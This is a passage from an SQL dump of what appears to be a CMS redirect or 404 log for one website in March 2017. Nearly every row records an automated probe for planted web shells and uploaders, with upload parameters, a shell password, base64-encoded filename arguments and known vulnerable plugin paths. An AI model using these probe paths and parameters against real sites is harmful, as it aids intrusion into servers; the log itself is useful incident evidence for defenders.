12:40:26','0000-00-00 00:00:00'),(7540,'http://www.hallcrestheights.org/sites/all/libraries/elfinder/files/MLeRXr.php',NULL,'','',1,0,'2017-03-10 12:40:26','0000-00-00 00:00:00'),(7541,'http://www.hallcrestheights.org/wp-installation.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:40:27','0000-00-00 00:00:00'),(7542,'http://www.hallcrestheights.org/media/mass.php',NULL,'','',1,0,'2017-03-10 12:40:27','0000-00-00 00:00:00'),(7543,'http://www.hallcrestheights.org/E.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:40:28','0000-00-00 00:00:00'),(7544,'http://www.hallcrestheights.org/Jijle3.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:40:28','0000-00-00 00:00:00'),(7545,'http://www.hallcrestheights.org/xup.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:40:29','0000-00-00 00:00:00'),(7546,'http://www.hallcrestheights.org/zebda.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:40:30','0000-00-00 00:00:00'),(7547,'http://www.hallcrestheights.org/kk.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:40:32','0000-00-00 00:00:00'),(7548,'http://www.hallcrestheights.org/wp_logns.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:40:33','0000-00-00 00:00:00'),(7549,'http://hallcrestheights.org/test/wp-admin/setup-config.php',NULL,'','',5,0,'2017-03-11 19:33:45','0000-00-00 00:00:00'),(7550,'http://hallcrestheights.org/old/wp-admin/setup-config.php',NULL,'','',4,0,'2017-03-11 19:33:45','0000-00-00 00:00:00'),(7551,'http://hallcrestheights.org/sql-bak.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 05:40:09','0000-00-00 00:00:00'),(7552,'http://hallcrestheights.org/email.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 05:40:51','0000-00-00 00:00:00'),(7553,'http://hallcrestheights.org/functions.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 05:41:28','0000-00-00 00:00:00'),(7554,'http://hallcrestheights.org/cache/news.php?z3=dmlRYnVJLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 05:42:50','0000-00-00 00:00:00'),(7555,'http://hallcrestheights.org/tmp.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',4,0,'2017-03-12 05:43:45','0000-00-00 00:00:00'),(7556,'http://hallcrestheights.org/shootme.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',8,0,'2017-03-12 05:44:32','0000-00-00 00:00:00'),(7557,'http://hallcrestheights.org/configurationbak.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 05:45:19','0000-00-00 00:00:00'),(7558,'http://hallcrestheights.org/robots.txt.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 05:46:12','0000-00-00 00:00:00'),(7559,'http://hallcrestheights.org/jconfig.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 05:46:42','0000-00-00 00:00:00'),(7560,'http://hallcrestheights.org/media/reads.php?z3=dmlRYnVJLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 05:47:30','0000-00-00 00:00:00'),(7561,'http://hallcrestheights.org/media/1ndex.php?z3=dmlRYnVJLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 05:47:57','0000-00-00 00:00:00'),(7562,'http://hallcrestheights.org/libraries/joomla/jmails.php?z3=dmlRYnVJLnBocA==&z4=L2xpYnJhcmllcy9qb29tbGEv',NULL,'hallcrestheights.org','',2,0,'2017-03-12 05:48:38','0000-00-00 00:00:00'),(7563,'http://hallcrestheights.org/sql_dump.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 05:49:23','0000-00-00 00:00:00'),(7564,'http://hallcrestheights.org/error-logs.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 05:50:45','0000-00-00 00:00:00'),(7565,'http://hallcrestheights.org/media/404.php?z3=dmlRYnVJLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 05:51:22','0000-00-00 00:00:00'),(7566,'http://hallcrestheights.org/media/tmp.php?z3=dmlRYnVJLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 05:52:14','0000-00-00 00:00:00'),(7567,'http://hallcrestheights.org/r3x.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 05:53:01','0000-00-00 00:00:00'),(7568,'http://hallcrestheights.org/log.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 05:53:50','0000-00-00 00:00:00'),(7569,'http://hallcrestheights.org/images/stories/0day.php?z3=dmlRYnVJLnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 05:54:48','0000-00-00 00:00:00'),(7570,'http://hallcrestheights.org/includes/u2p.php?z3=dmlRYnVJLnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 05:55:34','0000-00-00 00:00:00'),(7571,'http://hallcrestheights.org/images/xxx.php?z3=dmlRYnVJLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-12 05:56:11','0000-00-00 00:00:00'),(7572,'http://hallcrestheights.org/al277.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 05:56:58','0000-00-00 00:00:00'),(7573,'http://hallcrestheights.org/roubt.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 05:57:16','0000-00-00 00:00:00'),(7574,'http://hallcrestheights.org/includes.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 05:57:40','0000-00-00 00:00:00'),(7575,'http://hallcrestheights.org/images/al277.php?z3=dmlRYnVJLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-12 05:58:11','0000-00-00 00:00:00'),(7576,'http://hallcrestheights.org/webconfig.txt.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 05:58:46','0000-00-00 00:00:00'),(7577,'http://hallcrestheights.org/cache/cachee.php?z3=dmlRYnVJLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:00:26','0000-00-00 00:00:00'),(7578,'http://hallcrestheights.org/thumb.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:00:50','0000-00-00 00:00:00'),(7579,'http://hallcrestheights.org/configbak.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:02:33','0000-00-00 00:00:00'),(7580,'http://hallcrestheights.org/wp-main.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:03:12','0000-00-00 00:00:00'),(7581,'http://hallcrestheights.org/robot.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:03:51','0000-00-00 00:00:00'),(7582,'http://hallcrestheights.org/install.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:04:22','0000-00-00 00:00:00'),(7583,'http://hallcrestheights.org/images/1ndex.php?z3=dmlRYnVJLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:04:41','0000-00-00 00:00:00'),(7584,'http://hallcrestheights.org/dswat.org/wsdl.php?z3=dmlRYnVJLnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:05:28','0000-00-00 00:00:00'),(7585,'http://hallcrestheights.org/resd.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-12 06:06:05','0000-00-00 00:00:00'),(7586,'http://hallcrestheights.org/injctory.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:07:28','0000-00-00 00:00:00'),(7587,'http://hallcrestheights.org/mmytc.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:07:51','0000-00-00 00:00:00'),(7588,'http://hallcrestheights.org/M-F4r3s.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:08:37','0000-00-00 00:00:00'),(7589,'http://hallcrestheights.org/images/laj.php?z3=dmlRYnVJLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:09:05','0000-00-00 00:00:00'),(7590,'http://hallcrestheights.org/cache/cache_aqbmkwwx.php?z3=dmlRYnVJLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:09:32','0000-00-00 00:00:00'),(7591,'http://hallcrestheights.org/wsdl.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:10:02','0000-00-00 00:00:00'),(7592,'http://hallcrestheights.org/goog1es.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:10:34','0000-00-00 00:00:00'),(7593,'http://hallcrestheights.org/site/tmp/cTivrC.php?z3=dmlRYnVJLnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:11:05','0000-00-00 00:00:00'),(7594,'http://hallcrestheights.org/update.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:11:28','0000-00-00 00:00:00'),(7595,'http://hallcrestheights.org/news.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:12:04','0000-00-00 00:00:00'),(7596,'http://hallcrestheights.org/SessionController.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:12:39','0000-00-00 00:00:00'),(7597,'http://hallcrestheights.org/maill.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:13:22','0000-00-00 00:00:00'),(7598,'http://hallcrestheights.org/error-log.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:14:58','0000-00-00 00:00:00'),(7599,'http://hallcrestheights.org/M-J!r4ya-F4r3s.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:15:32','0000-00-00 00:00:00'),(7600,'http://hallcrestheights.org/authenticating.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:15:54','0000-00-00 00:00:00'),(7601,'http://hallcrestheights.org/google-assist.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:16:31','0000-00-00 00:00:00'),(7602,'http://hallcrestheights.org/images/google-assist.php?z3=dmlRYnVJLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:17:14','0000-00-00 00:00:00'),(7603,'http://hallcrestheights.org/images/robots.txt.php?z3=dmlRYnVJLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:17:47','0000-00-00 00:00:00'),(7604,'http://hallcrestheights.org/elements.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:18:23','0000-00-00 00:00:00'),(7605,'http://hallcrestheights.org/xmlsrpc.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:18:47','0000-00-00 00:00:00'),(7606,'http://hallcrestheights.org/wp-cache.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:19:17','0000-00-00 00:00:00'),(7607,'http://hallcrestheights.org/images/404.php?z3=dmlRYnVJLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:19:55','0000-00-00 00:00:00'),(7608,'http://hallcrestheights.org/images/head.php?z3=dmlRYnVJLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:20:34','0000-00-00 00:00:00'),(7609,'http://hallcrestheights.org/cache/support.php?z3=dmlRYnVJLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:21:07','0000-00-00 00:00:00'),(7610,'http://hallcrestheights.org/RoseLeif.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:21:43','0000-00-00 00:00:00'),(7611,'http://hallcrestheights.org/Abbrevsprl.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:22:26','0000-00-00 00:00:00'),(7612,'http://hallcrestheights.org/show.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:23:03','0000-00-00 00:00:00'),(7613,'http://hallcrestheights.org/images/defau1t.php?z3=dmlRYnVJLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:23:37','0000-00-00 00:00:00'),(7614,'http://hallcrestheights.org/cli/40dd1d.php?z3=dmlRYnVJLnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:24:24','0000-00-00 00:00:00'),(7615,'http://hallcrestheights.org/bk.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:25:02','0000-00-00 00:00:00'),(7616,'http://hallcrestheights.org/infos.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:26:03','0000-00-00 00:00:00'),(7617,'http://hallcrestheights.org/cache/defau1t.php?z3=dmlRYnVJLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:26:33','0000-00-00 00:00:00'),(7618,'http://hallcrestheights.org/A.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:27:09','0000-00-00 00:00:00'),(7619,'http://hallcrestheights.org/bookmark.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:27:43','0000-00-00 00:00:00'),(7620,'http://hallcrestheights.org/wp-data.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:28:53','0000-00-00 00:00:00'),(7621,'http://hallcrestheights.org/wp-content/plugins/Fbrrchive.php?z3=dmlRYnVJLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:29:27','0000-00-00 00:00:00'),(7622,'http://hallcrestheights.org/wp-content/uploads/Fbrrchive.php?z3=dmlRYnVJLnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:30:00','0000-00-00 00:00:00'),(7623,'http://hallcrestheights.org/wp-content/plugins/myshe.php?z3=dmlRYnVJLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:30:47','0000-00-00 00:00:00'),(7624,'http://hallcrestheights.org/wp-content/plugins/wp-cache.php?z3=dmlRYnVJLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:31:24','0000-00-00 00:00:00'),(7625,'http://hallcrestheights.org/wp-content/plugins/wp-footers.php?z3=dmlRYnVJLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:32:08','0000-00-00 00:00:00'),(7626,'http://hallcrestheights.org/wp-content/plugins/wpfootes.php?z3=dmlRYnVJLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',4,0,'2017-03-12 06:32:42','0000-00-00 00:00:00'),(7627,'http://hallcrestheights.org/wp-content/plugins/sql_dump.php?z3=dmlRYnVJLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:33:19','0000-00-00 00:00:00'),(7628,'http://hallcrestheights.org/wp-content/plugins/SocketIontrol.php?z3=dmlRYnVJLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:34:01','0000-00-00 00:00:00'),(7629,'http://hallcrestheights.org/wp-content/plugins/SocketIasrgasfontrol.php?z3=dmlRYnVJLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:34:49','0000-00-00 00:00:00'),(7630,'http://hallcrestheights.org/wp-content/plugins/caches.php?z3=dmlRYnVJLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:36:04','0000-00-00 00:00:00'),(7631,'http://hallcrestheights.org/head.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:36:41','0000-00-00 00:00:00'),(7632,'http://hallcrestheights.org/wp-content/plugins/Analyser.php?z3=dmlRYnVJLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:38:51','0000-00-00 00:00:00'),(7633,'http://hallcrestheights.org/cache/list.php?z3=dmlRYnVJLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:39:22','0000-00-00 00:00:00'),(7634,'http://hallcrestheights.org/images/interface.php?z3=dmlRYnVJLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:40:01','0000-00-00 00:00:00'),(7635,'http://hallcrestheights.org/sqldebug.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:40:31','0000-00-00 00:00:00'),(7636,'http://hallcrestheights.org/xmlrpc-activate.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:41:11','0000-00-00 00:00:00'),(7637,'http://hallcrestheights.org/keep.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:42:53','0000-00-00 00:00:00'),(7638,'http://hallcrestheights.org/tmpos.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-12 06:44:21','0000-00-00 00:00:00'),(7639,'http://hallcrestheights.org/link.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:44:28','0000-00-00 00:00:00'),(7640,'http://hallcrestheights.org/dcodzu.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:45:01','0000-00-00 00:00:00'),(7641,'http://hallcrestheights.org/codd.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:45:41','0000-00-00 00:00:00'),(7642,'http://hallcrestheights.org/cache/wcache7675n.PHP?z3=dmlRYnVJLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:46:13','0000-00-00 00:00:00'),(7643,'http://hallcrestheights.org/modules/mod_bookmark/helper.php?z3=dmlRYnVJLnBocA==&z4=L21vZHVsZXMvbW9kX2Jvb2ttYXJrLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:46:48','0000-00-00 00:00:00'),(7644,'http://hallcrestheights.org/content.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:47:25','0000-00-00 00:00:00'),(7645,'http://hallcrestheights.org/wp-content/plugins/sfn.php?z3=dmlRYnVJLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:48:02','0000-00-00 00:00:00'),(7646,'http://hallcrestheights.org/wp-content/plugins/wp-lg3.php?z3=dmlRYnVJLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:48:42','0000-00-00 00:00:00'),(7647,'http://hallcrestheights.org/wp-content/plugins/wp-lg2.php?z3=dmlRYnVJLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:49:08','0000-00-00 00:00:00'),(7648,'http://hallcrestheights.org/shootmei.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:49:50','0000-00-00 00:00:00'),(7649,'http://hallcrestheights.org/dcodqg.php?z3=dmlRYnVJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-12 06:50:32','0000-00-00 00:00:00'),(7650,'http://hallcrestheights.org/modules/mod_simplefileuploadv1.3/elements/viQbuI.php',NULL,'','',1,0,'2017-03-12 06:51:18','0000-00-00 00:00:00'),(7651,'http://hallcrestheights.org/wp-content/plugins/revslider/temp/update_extract/viQbuI.php',NULL,'','',1,0,'2017-03-12 06:51:32','0000-00-00 00:00:00'),(7652,'http://hallcrestheights.org/wp-content/uploads/viQbuI.php',NULL,'','',1,0,'2017-03-12 06:51:58','0000-00-00 00:00:00'),(7653,'http://hallcrestheights.org/viQbuI.php',NULL,'','',1,0,'2017-03-12 06:52:12','0000-00-00 00:00:00'),(7654,'http://hallcrestheights.org/sites/all/libraries/elfinder/files/viQbuI.php',NULL,'','',1,0,'2017-03-12 06:52:25','0000-00-00 00:00:00'),(7655,'http://hallcrestheights.org/sql-bak.php?z3=ZW85NkR3LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 02:55:53','0000-00-00 00:00:00'),(7656,'http://hallcrestheights.org/email.php?z3=ZW85NkR3LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 02:56:04','0000-00-00 00:00:00'),(7657,'http://hallcrestheights.org/functions.php?z3=ZW85NkR3LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 02:56:16','0000-00-00 00:00:00'),(7658,'http://hallcrestheights.org/sql-bak.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:00:12','0000-00-00 00:00:00'),(7659,'http://hallcrestheights.org/email.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:00:38','0000-00-00 00:00:00'),(7660,'http://hallcrestheights.org/functions.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:01:14','0000-00-00 00:00:00'),(7661,'http://hallcrestheights.org/cache/news.php?z3=MWlWckxJLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:02:27','0000-00-00 00:00:00'),(7662,'http://hallcrestheights.org/tmp.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',4,0,'2017-03-13 03:03:03','0000-00-00 00:00:00'),(7663,'http://hallcrestheights.org/shootme.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',8,0,'2017-03-13 03:03:27','0000-00-00 00:00:00'),(7664,'http://hallcrestheights.org/configurationbak.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:04:03','0000-00-00 00:00:00'),(7665,'http://hallcrestheights.org/robots.txt.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:04:33','0000-00-00 00:00:00'),(7666,'http://hallcrestheights.org/jconfig.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:04:47','0000-00-00 00:00:00'),(7667,'http://hallcrestheights.org/media/reads.php?z3=MWlWckxJLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:05:22','0000-00-00 00:00:00'),(7668,'http://hallcrestheights.org/media/1ndex.php?z3=MWlWckxJLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:05:53','0000-00-00 00:00:00'),(7669,'http://hallcrestheights.org/libraries/joomla/jmails.php?z3=MWlWckxJLnBocA==&z4=L2xpYnJhcmllcy9qb29tbGEv',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:06:13','0000-00-00 00:00:00'),(7670,'http://hallcrestheights.org/sql_dump.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:06:39','0000-00-00 00:00:00'),(7671,'http://hallcrestheights.org/error-logs.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:07:32','0000-00-00 00:00:00'),(7672,'http://hallcrestheights.org/media/404.php?z3=MWlWckxJLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:08:06','0000-00-00 00:00:00'),(7673,'http://hallcrestheights.org/media/tmp.php?z3=MWlWckxJLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:08:37','0000-00-00 00:00:00'),(7674,'http://hallcrestheights.org/r3x.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:08:54','0000-00-00 00:00:00'),(7675,'http://hallcrestheights.org/log.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:09:26','0000-00-00 00:00:00'),(7676,'http://hallcrestheights.org/images/stories/0day.php?z3=MWlWckxJLnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:10:03','0000-00-00 00:00:00'),(7677,'http://hallcrestheights.org/includes/u2p.php?z3=MWlWckxJLnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:10:41','0000-00-00 00:00:00'),(7678,'http://hallcrestheights.org/images/xxx.php?z3=MWlWckxJLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:11:08','0000-00-00 00:00:00'),(7679,'http://hallcrestheights.org/al277.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:11:36','0000-00-00 00:00:00'),(7680,'http://hallcrestheights.org/roubt.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:12:00','0000-00-00 00:00:00'),(7681,'http://hallcrestheights.org/includes.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:12:35','0000-00-00 00:00:00'),(7682,'http://hallcrestheights.org/images/al277.php?z3=MWlWckxJLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:13:08','0000-00-00 00:00:00'),(7683,'http://hallcrestheights.org/webconfig.txt.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:13:37','0000-00-00 